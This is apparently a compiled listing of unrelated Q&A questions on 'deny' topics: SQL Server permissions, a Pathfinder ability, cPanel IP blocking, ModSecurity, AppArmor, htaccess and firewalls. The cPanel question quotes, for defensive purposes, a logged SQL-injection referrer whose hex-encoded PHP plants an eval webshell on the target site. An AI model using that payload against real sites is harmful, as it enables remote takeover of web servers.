What could cause SQL Server to deny execution of a SP at first, but allow it later with no privileges change?

A user just complained he was denied the execution of a procedure. I went to check and verified he had the privileges to execute it. I didn’t change anything (and right now I’m the only one with admin privileges do to so if needed) and after two unsuccessful attempts he tried to run the SP for the third time and it worked.

I have XE configured to catch error messages and it captured twice the error code 229:

The EXECUTE permission was denied on the object ‘storedProcedureName’, database ‘databaseName’, schema ‘schemaName’.

Is there any situation where this behavior is expected?


Microsoft SQL Server 2014 (SP3-CU-GDR) (KB4535288) – 12.0.6372.1 (X64)

What can Psychoportive Talent effectively deny?

The description of the Psychoportive Talent Trait says,

You can expend your psionic focus as an immediate action to make a five-foot step. You may do this even if you have already moved in the round in question, although not if you have already taken a five-foot step, and doing so does not prevent further movement in this round.

What kind of attacks can I completely negate by using this ability ? Specifically (assuming no one has Reach):

1). A single melee attack from a creature who starts adjacent to me on the beginning of its turn.
2). All iterative melee attacks from the same creature.
3). A single melee attack from a creature who takes a regular Move action on its turn to move adjacent to me.
4). An attack from a creature made as part of a charge on its turn.
5). All iterative attacks from the same charging creature with Pounce.
6). A projectile ranged attack (i.e. crossbow bolt) targeting me.
6a). Same as above, and I am able to Psychoport behind an obstacle to break LoS.
7, 7a). A Ray attack targeting me (same consideration as above).
8). A Line/Cone/Burst/Spread spell effect, when I am able to Psychoport out of its area of effect.

I think there must be some basic unifying rule that describes how immediate movement interacts with attacks, but I don’t know what it might be.

cPanel deny IP Addresses of spammers

I have a drupal 7 site, but this question is a more generic one. In the logs I’m seeing regular “attacks” to access protected resources. So attackers are just trying. I’m starting to see more sophisticated attacks such as :

example.com/user.php?act=login 

and with a referrer:

554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a325175634768774a79776e50443977614841675a585a686243676b58314250553152625a5630704f79412f506d4669597963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";} 

When I’m checking the ip addresses of these attacks 98% they are already registered as spam in the stopforumspam database.

Is there a way to have a list or an api at cPanel level not to have to have to deny each ip address manually.

My question is about cPanel not drupal, since I believe it is better to block them at a higher level even before reaching drupal.

In drupal I have a stopforumspam module but this is used to deny registration, which does not prevent attacks such as the one above.

What I need is to be able to block these attacks from known spammer Ips without having to add each ip address manualy in the deny Ip address list in cPanel.

Many thanks

For certain URI, is it possible to log the rule violation instead of returning access deny?

We have set up Modsecurity CRS with Nginx (it is awesome!), and we are in the phase of customization (or writing the exclusion rules). We’d like to know if it is possible that modsec can only log the exception for certain URIs without adding up the score while the rest of the URIs still being protected. Or, whenever it tries to return Access Deny, it will check if it for certain URIs first. I’ve read a couple of tutorials and they suggest either setting detection mode or the threshold to a huge number, while we’d like to start the protection now but don’t want to affect certain URIs as they are critical for business. If modsec finds rules violation for those URIs, we’d like modsec to log it only and we’ll write exclusion rules after reviewing the logs. Thanks.

Modsec verion: v3.0.3

Nginx version: 1.13.6

Is apparmor default deny?

Is apparmor default deny? For example consider the case under SELinux in enforcing mode, where I install a package with no policy associated with it. SELinux’s default behaviour is to deny all syscalls that application makes. Does apparmor work the same way, or do you need to explicitly create the policy first and install it.

Deny access to all PHP files using FilesMatch, but make an exception for one

Currently, using htaccess I am denying access to any PHP file in a directory, but not the JS, PNG, CSS files in the same directory.

<FilesMatch "\.php$  "> Order deny,allow Deny from all </FilesMatch> 

What if I want to make an exception for one file (“foobar.php” for example) however? Can I write multiple statements in a single htaccess? What is the order of execution?

Are GMs obligated to hand out all possible treasure and loot in an adventure, or can GMs deny PCs printed loot?

I was wondering as GM and long time player, are the PCs entitled to all the loot and treasure that they could find in location and or after looting the bodies of fallen foes?

Example: In Pathfinder’s Giantslayer Adventure Path I once GMed and am currently playing in, I noticed that the GM would award only one use items, skip items that were used during the encounter that were not one shot items, or not even give any loot after a skirmish or searching a room that I knew was loaded with good loot and gear.

I never brought it up ’cause I didn’t want to call them out and kill the game. When I ran the Adventure Path I very much remember handing out all the loot or treasure that could be found in a location, barring the PCs making the checks to find them, as well as anything they could find after looting the bodies of defeated foes, with the exception of one shots like scrolls and potions.

Is this fair, or as GMs are we allowed to deny PCs these listed items from the Adventure Path?

Apparmor deny create operation

I have a problem with IPSec. After debugging, I found this message in dmesg:

apparmor=“DENIED” operation=“create” profile=“/usr/lib/ipsec/charon” ..... requested_mask=“create” denied_mask=“create” 

I tried to edit /etc/apparmor.d/usr.lib.ipsec.charon, and give /usr/lib/ipsec/charon Permession: rwmix But the problem still there. Any solution?

Is DENY ALL enough for an edge router?

If linux is being used as the edge router/firewall/dmz/gateway, is denying all incoming traffic enough? That is, assuming nothing like sshd is open to the public eth port.

Are there other measures that need to be taken?

I’m trying to find the difference between a normal router like Unifi, Linksys etc, and an ubuntu box with 2 Eths. Is there some sort of magic I’m missing?

I mean, there’s the obvious IPS and DDOS protection. But for the basic security, deny all, actually deny’s all, right? heh.